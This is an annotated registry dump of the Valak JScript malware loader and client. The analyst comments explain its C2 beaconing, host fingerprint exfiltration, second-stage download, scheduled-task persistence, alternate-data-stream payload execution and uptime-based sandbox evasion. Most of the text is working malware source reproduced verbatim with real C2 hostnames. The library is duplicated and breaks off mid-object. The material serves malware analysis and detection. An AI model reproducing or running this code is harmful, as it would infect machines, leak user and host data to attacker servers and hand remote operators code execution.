- #Valak #Config #New — Valak JScript loader/library ("WebLib32") and client ("ServerUrl") scripts, together with their configuration, as recovered from HKCU\SOFTWARE\ApplicationContainer\Appsw64 (last write 2020-06-03). The embedded scripts are live malware: read them in an isolated environment and do not execute them on a real host.
- Key Name: HKEY_CURRENT_USER\SOFTWARE\ApplicationContainer
- Class Name: <NO CLASS>
- Last Write Time: 6/3/2020 - 10:49 PM
- Key Name: HKEY_CURRENT_USER\SOFTWARE\ApplicationContainer\Appsw64
- Class Name: <NO CLASS>
- Last Write Time: 6/3/2020 - 10:49 PM
- Value 0
- Name: ShimV4
- Type: REG_SZ
- Data: http://a-zcorner.com
- Value 1
- Name: SetupServiceKey
- Type: REG_SZ
- Data: 79e5036f32
- Value 2
- Name: ServerUrl
- Type: REG_SZ
// === Registry value "ServerUrl" (REG_SZ): the Valak JScript *client* ===
// Analyst annotations only; the code is reproduced verbatim from the registry dump.
// Loader.Persist() (in the WebLib32 value further down) writes this script to
// C:\Users\Public\Disk0.js, where the "Disk Diagnostics" task runs it every 6 min.
// Live malware: read in an isolated environment, never execute on a real host.
var client_config = {
  // C2 hosts polled in order by Client.GetTask(); all plain HTTP, no TLS.
  // The first three resemble Microsoft CDN / Bing-crawler hostnames; the dump's
  // ShimV4 value records http://a-zcorner.com as the host that actually answered.
  COMMAND_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  SOFT_SIG : 'mad29',                              // build/campaign tag; not read by this script
  CLIENT_ID : '7EF8C89EC08D346C7D45FC7994D29D96',  // not referenced anywhere in this script
  C2_REQUEST_SLEEP : 20,                           // seconds slept between C2 hosts in GetTask()
  C2_FAIL_SLEEP : 1,                               // not read by this script
  C2_FAIL_COUNT : 3,                               // not read by this script
  C2_OB_KEY : 'JxTRG4mY',                          // static secret folded into every XOR key (DataTools.DeriveKey)
  SOFT_VERSION : 32,                               // not read here; the library's own config carries the same value
  C2_COMMAND_PREFIX : 'api.aspx',                  // tasking endpoint path
  C2_USE_IEXPLORE : false                          // not read by this script
}
// Defined before the library is eval'd so the library's own entry check
// (`typeof(CLIENT_IMPORT_ENV) == typeof(undefined)`) skips Loader.DeployClient().
var CLIENT_IMPORT_ENV = true;
var Client = {};
// WScript.Shell: used for registry reads and (via the library) command execution.
Client.CoMainObject = new ActiveXObject('WScript.Shell');
// Reads the library script back out of HKCU (the "WebLib32" value shown further
// down in this dump). Returns the raw script text.
Client.LoadLibraryReg = function(){
  return Client.CoMainObject.RegRead("HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\WebLib32");
}
// Stages the library from the registry: eval() of whatever WebLib32 holds, then
// the library's top-level objects are captured onto Client. The value is
// evaluated verbatim, so anyone able to write that HKCU value controls what this
// script executes. Detection: a script host reading HKCU\...\Appsw64\WebLib32.
Client.LibraryLoadContext = function(){
  eval(Client.LoadLibraryReg());
  Client.Windows = Windows;
  Client.GlobalStrings = GlobalStrings;
  Client.DataTools = DataTools;
  Client.ObjectProducer = ObjectProducer;
  Client.Http = Http;
  Client.Loader = Loader;
  Client.debug = debug;
}
// Builds the tasking URL path:
//   api.aspx?dx11diag=<urlenc(b64(xor(uid, k)))>&apikey=<2 random letters>&g=<nonce>&selected=2
// with k = DataTools.DeriveKey(nonce + C2_OB_KEY). The nonce travels in clear in
// `g` and C2_OB_KEY is static, so k is recoverable from captured traffic alone.
// The third argument passed to RotString is ignored (the function takes two).
Client.GetWorkerEndpoint = function(){
  var nonce = Client.DataTools.Random.String(12);
  var uid = Client.Loader.GetUid();
  var sessionKey = nonce + client_config.C2_OB_KEY;
  var encodedId = Client.DataTools.RotString(uid, Client.DataTools.DeriveKey(sessionKey), 0);
  encodedId = Base64Encode(encodedId);
  encodedId = encodeURIComponent(encodedId);
  return client_config.C2_COMMAND_PREFIX + "?dx11diag=" + encodedId + "&apikey=" + Client.DataTools.Random.String(2) + "&g=" + nonce + "&selected=2";
}
// Schedules a one-shot task "SoundIndex_<taskName>" that launches the payload
// stored in the alternate data stream C:\Users\Public\diskdiag.ini:<taskName>
// via `wmic process call create`, at the current time plus one minute.
// Defects visible in the code (worth knowing when a sample's task never fires):
//  - the zero-padding test uses minutes+3 while the value uses minutes+1, so
//    minutes 7 and 8 produce an unpadded "HH:8" / "HH:9";
//  - no roll-over: minutes == 59 yields "HH:60"; no date is supplied either.
// `taskName` comes straight from the C2 reply and is substituted into the
// command line without any escaping.
Client.PrepareExectionTask = function(taskName){
  var currentTime = new Date(),
  hours = currentTime.getHours(),
  minutes = currentTime.getMinutes();
  hours = hours < 10 ? "0" + hours.toString() : hours;
  minutes = (minutes + 3) < 10 ? "0" + (minutes + 1).toString() : (minutes + 1);
  var time = hours + ":" + minutes;
  // "<NTFILE_PATH>:<taskName>" — an NTFS ADS path, executed directly.
  var path = Client.GlobalStrings.NTFILE_PATH.concat(":").concat(taskName);
  var execCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC, "path=".concat(path).concat("&q=w"));
  var taskCommand = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.TASK_CREATE, "name=SoundIndex_".concat(taskName).concat("&command=").concat(execCommand).concat("&time=").concat(time))
  Client.Windows.Execute(taskCommand);
}
// Runs the plugin host dropped by Loader.DeployHost() (%temp%\<uid>.bin) with
// the C2-supplied plugin id as its only argument, again through wmic, so the
// child is typically parented by WmiPrvSE.exe rather than the script host.
Client.ExecutePlugin = function(pluginId){
  var hostPath = Client.Windows.GetEnv("%temp%").concat("\\").concat(Client.Loader.GetUid()).concat(".bin");
  var command = Client.DataTools.Strings.ParseTemplate(Client.GlobalStrings.WMIC_EXEC_ARGS, "path=".concat(hostPath).concat("&args=").concat(pluginId));
  Client.Windows.Execute(command);
}
// One polling pass over COMMAND_C2. Every reply is XOR-decoded with
// DeriveKey(uid + C2_OB_KEY) — the reply key is bound to the bot id, not to the
// per-request nonce. Two command shapes are recognised (judging by the indexing):
//   "--TASK--<name>--<base64 payload>": schedule a task for <name>, then write the
//     decoded payload into the ADS diskdiag.ini:<name>. The task is created
//     *before* the bytes land, so a tight schedule could fire on an empty stream.
//   "--PLUGIN--<id>": run the plugin host with <id>.
// Failed / non-200 requests come back as "" and fall through to the 20 s sleep
// and the next host. The first recognised command ends the pass.
Client.GetTask = function(){
  for(var i = 0; i < client_config.COMMAND_C2.length; i++){
    var response = Client.Http.Request(client_config.COMMAND_C2[i].concat("/").concat(Client.GetWorkerEndpoint()));
    response = Client.DataTools.RotString(response, Client.DataTools.DeriveKey(Client.Loader.GetUid().concat(client_config.C2_OB_KEY)));
    if(response.indexOf("--TASK") !== -1){
      var executionTask = response.replace('--TASK--', '').split('--')[1];
      var taskName = response.split('--')[2];
      Client.PrepareExectionTask(taskName);
      Client.Windows.WriteDataStreamBytes(Client.GlobalStrings.NTFILE_PATH, taskName, Base64bytes(executionTask));
      return;
    }
    if(response.indexOf('--PLUGIN') !== -1){
      var plugin = response.replace('--PLUGIN--', '');
      Client.ExecutePlugin(plugin);
      return;
    }
    WScript.Sleep(client_config.C2_REQUEST_SLEEP * 1000);
  }
}
// Decodes a base64 string through MSXML's bin.base64 typed node and returns an
// *open* binary ADODB.Stream holding the bytes. Callers (Windows.WriteBytes /
// WriteDataStreamBytes) are responsible for SaveToFile and Close.
function Base64bytes(string){
  var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  var element = XmlDOM.createElement("Base64Data");
  element.dataType = "bin.base64";
  element.text = string;
  var stream = WScript.CreateObject("ADODB.Stream");
  stream.Type = 1;      // adTypeBinary
  stream.Open();
  stream.Write(element.nodeTypedValue);
  return stream;
}
// Converts a string to a byte array by round-tripping it through an ADODB.Stream:
// written as "ascii" text, then re-read as binary. Non-ASCII characters are not
// expected here (inputs are XOR'd ASCII with a small key).
function StringToBinary(string){
  var BinaryStream = new ActiveXObject("ADODB.Stream");
  BinaryStream.Type = 2;      // adTypeText
  BinaryStream.CharSet = "ascii";
  BinaryStream.Open();
  BinaryStream.WriteText(string);
  BinaryStream.Position = 0;
  BinaryStream.Type = 1;      // switch to adTypeBinary and read back the bytes
  BinaryStream.Position = 0;
  return BinaryStream.Read();
}
// Base64-encodes a string via MSXML. The first replace removes the line breaks
// MSXML inserts every 76 characters; the second strips every "//" from the
// output, which silently corrupts any encoding containing two consecutive
// slashes — presumably the server side tolerates or reverses this (not
// verifiable from the dump).
function Base64Encode(string) {
  var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  var element = XmlDOM.createElement("Base64Data");
  element.dataType = "bin.base64";
  element.nodeTypedValue = StringToBinary(string);
  return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}
// Entry point: pull the library in from the registry, wait one minute, then make
// a single tasking pass. Re-execution comes from the 6-minute scheduled task.
Client.LibraryLoadContext();
WScript.Sleep(1 * 60 * 1000);
Client.GetTask();
- Value 3
- Name: WebLib32
- Type: REG_SZ
// === Registry value "WebLib32" (REG_SZ): the Valak JScript *loader / library* ===
// Analyst annotations only; the code is reproduced verbatim from the registry dump.
// Run standalone it performs the initial check-in and persistence
// (Loader.DeployClient); eval'd by the client above (CLIENT_IMPORT_ENV defined)
// it only supplies helper objects. Live malware: never execute on a real host.
var config = {
  // Same host list as the client's COMMAND_C2; tried round-robin by DeployClient().
  PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  SOFT_SIG : 'mad29',          // build/campaign tag, part of the check-in and of the bot id
  SOFT_VERSION: 32,            // appended to the bot id; see Loader.GetUid
  C2_REQUEST_SLEEP : 21,       // seconds between hosts in DeployClient()
  C2_FAIL_SLEEP : 21,          // not read anywhere in this script
  C2_FAIL_COUNT : 20,          // full passes over PRIMARY_C2 before giving up
  C2_OB_KEY : 'JxTRG4mY',      // static secret folded into every XOR key
  C2_PREFIX : 'rpc.aspx'       // check-in endpoint path
}
// Host that answered the check-in; stays the first entry until DeployClient() succeeds.
var SELECTED_C2 = config.PRIMARY_C2[0];
// Polyfill for Math.imul (not available in the legacy JScript engine behind
// wscript.exe), installed unconditionally. Required by DataTools.Hash.
Math.imul = function (a, b) {
  var ah = (a >>> 16) & 0xffff;
  var al = a & 0xffff;
  var bh = (b >>> 16) & 0xffff;
  var bl = b & 0xffff;
  return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
};
// Host-side constants; every entry is a concrete indicator for this sample.
var GlobalStrings = {
  REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",   // config / stage storage (this dump)
  WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",              // plugin launch (Client.ExecutePlugin)
  WMIC_EXEC : "wmic process call create \"%path%\"",                          // ADS payload launch (Client.PrepareExectionTask)
  TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",           // one-shot payload task
  TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",  // recurring client task
  NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",   // decoy file whose alternate data streams carry payloads
  ADS_SSID : "HDDScan",                              // not referenced anywhere in this dump
  PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",   // client script, launched through explorer's .js association
  TASK_NAME : "Disk Diagnostics"                     // name of the recurring task
}
// Tiny COM factory: a ProgID table plus `new ActiveXObject(progid)`.
// Only MAIN_SH_OBJECT, FS_DRIVE_OBJECT and HTTP_CLIENT_OBJECT are requested
// through it; the stream / XML helpers instantiate their ProgIDs directly.
var ObjectProducer = {}
ObjectProducer.AccesibleObjects = {
  MAIN_SH_OBJECT : 'WScript.Shell',
  STREAM_ACCESS_OBJECT : 'ADODB.Stream',
  XML_TREE_OBJECT : 'Microsoft.XMLDOM',
  XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument',
  HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP',
  FS_DRIVE_OBJECT : 'Scripting.FileSystemObject'
};
ObjectProducer.GetRootConstructor = function(){
  return ActiveXObject;
}
ObjectProducer.GetInstance = function(instanceKey){
  var rootConstructor = ObjectProducer.GetRootConstructor();
  return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]);
}
var DataTools = {};
DataTools.KEY_BASE = 1029;
// Reduces a key string to one small integer: XOR-folds every char code into
// KEY_BASE, then sums the decimal digits of the result. For the ASCII inputs
// used in this sample the folded value stays within 1024..1151, so the derived
// key is roughly in the range 2..19 — captured exchanges can be decoded by
// trying those few values even without the nonce.
DataTools.DeriveKey = function(keyStr){
  var keyBase = DataTools.KEY_BASE;
  var key = 0;
  for(var i = 0; i < keyStr.length; i++){
    keyBase = keyBase ^ keyStr.charCodeAt(i);
  }
  var _keyBase = keyBase.toString();
  for(var i = 0; i < _keyBase.length; i++){
    key += parseInt(_keyBase.charAt(i));
  }
  return key;
}
// XORs every character with the same small integer key. Symmetric: the same
// call both "encrypts" outgoing data and decodes C2 replies.
DataTools.RotString = function(str, key){
  var rotd = "";
  for(var i = 0; i < str.length; i++){
    rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key)));
  }
  return rotd;
}
// 32-bit multiplicative string hash (seed 0xdeadbeef, multiplier 2654435761,
// final `h ^ h>>>16` mix) returned as unpadded lower-case hex. Basis of the
// bot id in Loader.GetUid.
DataTools.Hash = function(str){
  for(var i = 0, h = 0xdeadbeef; i < str.length; i++)
    h = Math.imul(h ^ str.charCodeAt(i), 2654435761);
  return ((h ^ h >>> 16) >>> 0).toString(16);
}
// Math.random-based helpers (not cryptographic — used only for nonces and
// URL-filler values). Number(min, max) is inclusive on both ends; String(len)
// draws from the lower-case letters only.
DataTools.Random = {};
DataTools.Random.Number = function(min, max){
  min = Math.ceil(min);
  max = Math.floor(max);
  return Math.floor(Math.random() * (max - min + 1)) + min;
}
DataTools.Random.String = function(len){
  var alphabet = "qwertyuiopasdfghjklzxcvbnm";
  var result = "";
  for(var i = 0; i < len; i++){
    var chr = DataTools.Random.Number(0, alphabet.length-1);
    result = result.concat(alphabet.charAt(chr));
  }
  return result;
}
// Minimal templating: `templateStr` is "k1=v1&k2=v2…"; each `%k%` in `str` is
// replaced (first occurrence only) by its value. No escaping — a value that
// itself contains '&' or '=' is truncated at that character.
DataTools.Strings = {};
DataTools.Strings.ParseTemplate = function(str, templateStr){
  var template = templateStr.split('&');
  for(var i = 0; i < template.length; i++){
    var keyValue = template[i].split('=');
    str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]);
  }
  return str;
}
// Thin wrappers over WScript.Shell and Scripting.FileSystemObject.
var Windows = {};
Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT');
Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT');
// WshShell.Run with no window-style / wait arguments — the shell defaults apply.
// Every schtasks / wmic invocation in this sample goes through here.
Windows.Execute = function(command){
  Windows.CoMainObject.Run(command);
}
Windows.GetEnv = function(env){
  return Windows.CoMainObject.ExpandEnvironmentStrings(env);
}
Windows.RegRead = function(path){
  return Windows.CoMainObject.RegRead(path);
}
// All writes land under GlobalStrings.REG_ROOT (HKCU\...\Appsw64\), i.e. the key this dump was taken from.
Windows.RegWrite = function(entry, value){
  Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value);
}
// Creates `path` and fills it with 1024 random letters — the decoy content of
// C:\Users\Public\diskdiag.ini, whose alternate data streams later hold payloads.
// (CreateTextFile's third argument `true` selects Unicode output.)
Windows.CreateFile = function(path){
  var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true);
  fHandle.WriteLine(DataTools.Random.String(1024));
  fHandle.Close();
}
// The three *DataStream* helpers write to "<path>:<stream>", i.e. an NTFS
// alternate data stream of an existing file. Text variant (overwrites).
Windows.AppendDataStream = function(path, stream, data){
  var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true);
  fHandle.WriteLine(data);
  fHandle.Close();
}
// Binary variant: `data` is an open ADODB.Stream (see Base64bytes); 2 = adSaveCreateOverWrite.
Windows.AppendDataStreamB = function(path, stream, data){
  data.SaveToFile(path.concat(":").concat(stream), 2);
  data.Close();
}
// Overwrites `path` with text (second argument `true` = overwrite). Used for Disk0.js.
Windows.WriteData = function(path, data){
  var fHandle = Windows.FsIoObject.CreateTextFile(path, true);
  fHandle.Write(data);
  fHandle.Close();
}
// Saves an open binary ADODB.Stream to `path` (2 = overwrite). Used for %temp%\<uid>.bin.
Windows.WriteBytes = function(path, data){
  data.SaveToFile(path, 2);
  data.Close();
}
// Identical to AppendDataStreamB; this is the one Client.GetTask actually calls.
Windows.WriteDataStreamBytes = function(path, stream, data){
  data.SaveToFile(path.concat(":").concat(stream), 2);
  data.Close();
}
// Reads a whole text file; the handle is never closed.
Windows.ReadFile = function(path){
  var fHandle = Windows.FsIoObject.OpenTextFile(path, 1);
  return fHandle.ReadAll();
}
// WMI namespace root\cimv2 on `pcname` ("." = local machine).
Windows.GetWMIProvider = function(pcname){
  return GetObject("winmgmts:"+
  "{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2");
}
// System uptime in seconds from Win32_PerfFormattedData_PerfOS_System; 0 if
// WMI is unavailable. Loader.DeployClient treats a low value as a reason to
// quit (likely sandbox avoidance), so a WMI failure also aborts the loader.
Windows.GetUptime = function(){
  try{
    var wmi = Windows.GetWMIProvider(".");
    var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System");
    var e = new Enumerator(queryResult);
    return parseInt(e.item().SystemUpTime);
  }catch(e){
    return 0;
  }
}
// Despite the name this keys off the OS product name, not the CPU: "32" when
// ProductName contains "Windows 7", "64" otherwise. Sent as `rtag` in DeployHost.
Windows.GetArch = function(){
  var architecture = "64";
  var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName");
  if(product.indexOf('Windows 7') != -1){
    architecture = "32";
  }
  return architecture;
}
// Synchronous GET over a single reused MSXML2.XMLHTTP instance. Returns the
// response body on HTTP 200 and "" on any other status or on any exception, so
// callers cannot distinguish "no task" from "C2 unreachable". No TLS, no
// certificate or proxy handling, no custom headers.
var Http = {};
Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT');
Http.Request = function(url){
  try{
    Http.Client.Open('GET', url, false);
    Http.Client.Send();
    if(Http.Client.Status == 200)
      return Http.Client.ResponseText;
    else
      return "";
  }catch(e){
    return ""
  }
}
// Host fingerprint, collected once at load time from environment variables.
var Loader = {};
Loader.USERNAME = Windows.GetEnv("%username%");
Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%");
Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%");
Loader.Uptime = Windows.GetUptime();
// "true" when COMPUTERNAME differs from USERDOMAIN — a domain-membership
// heuristic (on a workgroup machine the two are normally equal). Sent as a string.
Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString();
// Bot id = hex hash of the fingerprint, with SOFT_VERSION appended as text.
// For the dumped host this is "79e5036f32" — exactly the SetupServiceKey value.
Loader.GetUid = function(){
  return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION;
}
// Check-in payload: "user:pc:domain:machinetype:uid:sig:version:uptime", XOR'd
// with DeriveKey(nonce + C2_OB_KEY), base64'd (see Base64Encode's "//" quirk)
// and URL-encoded. Since the nonce is sent alongside, the host fingerprint is
// recoverable from captured traffic.
Loader.GetInitialRequest = function(nonce){
  var uid = Loader.GetUid();
  var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime];
  var sessionKey = nonce + config.C2_OB_KEY;
  request = request.join(":");
  request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey));
  request = Base64Encode(request);
  return encodeURIComponent(request);
}
// Check-in path: /rpc.aspx?winrm=2387&view2=classic&regclid=<payload>&client=<31 rnd>&service_id=FE0<1..10000>&ubwG=<nonce>
// NOTE(review): the "®clid" in the literal below is almost certainly an HTML
// entity rendering artifact of the paste ("&reg" -> "®"); the parameter in the
// live sample is presumably "&regclid=". The literal is kept as dumped — confirm
// against a packet capture before building a signature on it.
Loader.GetInitialEndpoint = function(){
  var nonce = DataTools.Random.String(12)
  var request = Loader.GetInitialRequest(nonce);
  var endpoint = "/" + config.C2_PREFIX + "?winrm=2387&view2=classic®clid=" + request + "&client=" + DataTools.Random.String(31) + "&service_id=FE0" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce;
  return endpoint;
}
// Second-stage fetch:
//   GET <SELECTED_C2>/go.aspx?link=<4 rnd>&goal=6E&r_ctplGuid=<enc uid>&TS2=<nonce>&rtag=<32|64>&e6_endpoint=29283291210281_2
// The body is XOR-decoded with DeriveKey(uid + C2_OB_KEY), base64-decoded and
// dropped as %temp%\<uid>.bin — the "plugin host" that Client.ExecutePlugin
// later runs. The file is written even when the request failed (empty body).
// Returns the dropped path (unused by the caller, Loader.Persist).
Loader.DeployHost = function(){
  var temp = Windows.GetEnv("%temp%");
  var architecture = Windows.GetArch();
  var nonce = DataTools.Random.String(12);
  var uid = Loader.GetUid();
  var sessionKey = nonce + config.C2_OB_KEY;
  var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey));
  encodedId = Base64Encode(encodedId);
  encodedId = encodeURIComponent(encodedId);
  var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture + "&e6_endpoint=29283291210281_2");
  pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY)));
  var filename = uid.concat(".bin");
  Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost));
  return temp.concat("\\").concat(filename);
}
// Initial check-in (only when run standalone, see the entry check at the end).
//  - Quits if uptime <= 3000 s (~50 min) — or if WMI failed, since GetUptime
//    then returns 0. Likely sandbox / fresh-VM avoidance.
//  - Up to C2_FAIL_COUNT (20) passes over PRIMARY_C2 (8 hosts) with a 21 s
//    sleep after every attempt, i.e. up to ~56 minutes of polling.
//  - A reply decoding to "<<<CLIENT__<base64>" carries the client script. The
//    answering host is recorded in HKCU as ShimV4 and the bot id as
//    SetupServiceKey (both present in this dump), then Persist() takes over.
//  - All exceptions are swallowed; a failed pass is indistinguishable from "no reply".
Loader.DeployClient = function() {
  if (Loader.Uptime <= 3000) {
    WScript.Quit(0);
  }
  for (var i = 0; i < config.C2_FAIL_COUNT; i++) {
    for (var j = 0; j < config.PRIMARY_C2.length; j++) {
      try {
        var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint());
        response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY)));
        if (response.indexOf('<<<CLIENT__') !== -1) {
          var client = response.replace('<<<CLIENT__', '');
          client = Base64text(client);
          Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]);
          Windows.RegWrite("SetupServiceKey", Loader.GetUid());
          SELECTED_C2 = config.PRIMARY_C2[j];
          Loader.Persist(client);
          return;
        }
      } catch (e) {
      }
      WScript.Sleep(config.C2_REQUEST_SLEEP * 1000);
    }
  }
}
// Persistence and staging, in order:
//  1. schtasks "Disk Diagnostics": `explorer.exe C:\Users\Public\Disk0.js` every 6 minutes;
//  2. HKCU ServerUrl  <- the client script received at check-in;
//  3. HKCU WebLib32   <- this file's own text (WScript.ScriptFullName), which the client later eval()s;
//  4. C:\Users\Public\diskdiag.ini <- 1024 random letters (decoy carrier for ADS payloads);
//  5. C:\Users\Public\Disk0.js     <- the client script on disk;
//  6. DeployHost() fetches the plugin-host binary into %temp%.
// Everything lives under HKCU and C:\Users\Public — no elevation involved.
Loader.Persist = function(client){
  var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6");
  var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate);
  Windows.Execute(taskCommand);
  Windows.RegWrite("ServerUrl", client);
  Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName));
  Windows.CreateFile(GlobalStrings.NTFILE_PATH);
  Windows.WriteData("C:\\Users\\Public\\Disk0.js", client);
  Loader.DeployHost();
}
// Leftover debugging aid: shows `message` in a modal WshShell.Popup dialog.
// Exposed to the client as Client.debug; not called anywhere in this dump.
function debug(message){
  ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message);
}
// Decodes a base64 string to UTF-8 text: MSXML typed node -> binary
// ADODB.Stream -> re-read as text. Used to unwrap the client script at check-in.
function Base64text(string){
  var XmlDOM = new ActiveXObject("Microsoft.XMLDOM");
  var element = XmlDOM.createElement("tempContainer");
  element.dataType = "bin.Base64";
  element.text = string;
  var stream = WScript.CreateObject("ADODB.Stream");
  stream.Type = 1;        // adTypeBinary
  stream.Open();
  stream.Write(element.nodeTypedValue);
  stream.Position = 0;
  stream.Type = 2;        // adTypeText
  stream.CharSet = "utf-8";
  return stream.ReadText();
}
// Converts a string to a byte array by round-tripping it through an ADODB.Stream:
// written as "ascii" text, then re-read as binary. Same helper as in the client script.
function StringToBinary(string){
  var BinaryStream = new ActiveXObject("ADODB.Stream");
  BinaryStream.Type = 2;      // adTypeText
  BinaryStream.CharSet = "ascii";
  BinaryStream.Open();
  BinaryStream.WriteText(string);
  BinaryStream.Position = 0;
  BinaryStream.Type = 1;      // adTypeBinary
  BinaryStream.Position = 0;
  return BinaryStream.Read();
}
// Decodes a base64 string and returns an *open* binary ADODB.Stream of the
// bytes; the caller (Windows.WriteBytes / WriteDataStreamBytes) saves and closes it.
function Base64bytes(string){
  var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  var element = XmlDOM.createElement("Base64Data");
  element.dataType = "bin.base64";
  element.text = string;
  var stream = WScript.CreateObject("ADODB.Stream");
  stream.Type = 1;      // adTypeBinary
  stream.Open();
  stream.Write(element.nodeTypedValue);
  return stream;
}
// Base64-encodes a string via MSXML, stripping the inserted line breaks — and
// also every "//", which corrupts encodings that contain two consecutive
// slashes. Presumably tolerated server-side; cannot be confirmed from the dump.
function Base64Encode(string) {
  var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument");
  var element = XmlDOM.createElement("Base64Data");
  element.dataType = "bin.base64";
  element.nodeTypedValue = StringToBinary(string);
  return element.text.replace(/\n/g, "").replace(/\/\//g, "");
}
// Entry check: when this file is run on its own, CLIENT_IMPORT_ENV is undefined
// and the loader path (check-in + persistence) executes. When the client script
// eval()s this text it has already defined CLIENT_IMPORT_ENV, so only the helper
// objects are installed.
if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){
  Loader.DeployClient();
}
// NOTE(review): from here on the WebLib32 library script is repeated verbatim
// (no registry metadata separates it from the copy above). This is presumably a
// dump / paste artifact rather than a second registry value — confirm against
// the original hive. Annotations are repeated so each copy reads standalone.
// Loader/library configuration; same host list as the client's COMMAND_C2.
var config = {
  PRIMARY_C2 : ['http://az361816.vo.msecnd.net','http://msnbot-207-46-194-33.search.msn.com','http://ec.atdmt.com','http://a-zcorner.com','http://knockoutlights.com','http://organicgreensfl.com','http://d0d0f3d189430.com','http://d0d0abee1d18255e.com'],
  SOFT_SIG : 'mad29',          // build/campaign tag, part of the check-in and of the bot id
  SOFT_VERSION: 32,            // appended to the bot id; see Loader.GetUid
  C2_REQUEST_SLEEP : 21,       // seconds between hosts in DeployClient()
  C2_FAIL_SLEEP : 21,          // not read anywhere in this script
  C2_FAIL_COUNT : 20,          // full passes over PRIMARY_C2 before giving up
  C2_OB_KEY : 'JxTRG4mY',      // static secret folded into every XOR key
  C2_PREFIX : 'rpc.aspx'       // check-in endpoint path
}
// Host that answered the check-in; stays the first entry until DeployClient() succeeds.
var SELECTED_C2 = config.PRIMARY_C2[0];
// Polyfill for Math.imul (missing in legacy JScript); required by DataTools.Hash.
Math.imul = function (a, b) {
  var ah = (a >>> 16) & 0xffff;
  var al = a & 0xffff;
  var bh = (b >>> 16) & 0xffff;
  var bl = b & 0xffff;
  return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0);
};
// Host-side constants; every entry is a concrete indicator for this sample.
var GlobalStrings = {
  REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\",   // config / stage storage (this dump)
  WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"",              // plugin launch (Client.ExecutePlugin)
  WMIC_EXEC : "wmic process call create \"%path%\"",                          // ADS payload launch (Client.PrepareExectionTask)
  TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%",           // one-shot payload task
  TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%",  // recurring client task
  NTFILE_PATH : "C:\\Users\\Public\\diskdiag.ini",   // decoy file whose alternate data streams carry payloads
  ADS_SSID : "HDDScan",                              // not referenced anywhere in this dump
  PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\Disk0.js",   // client script, launched through explorer's .js association
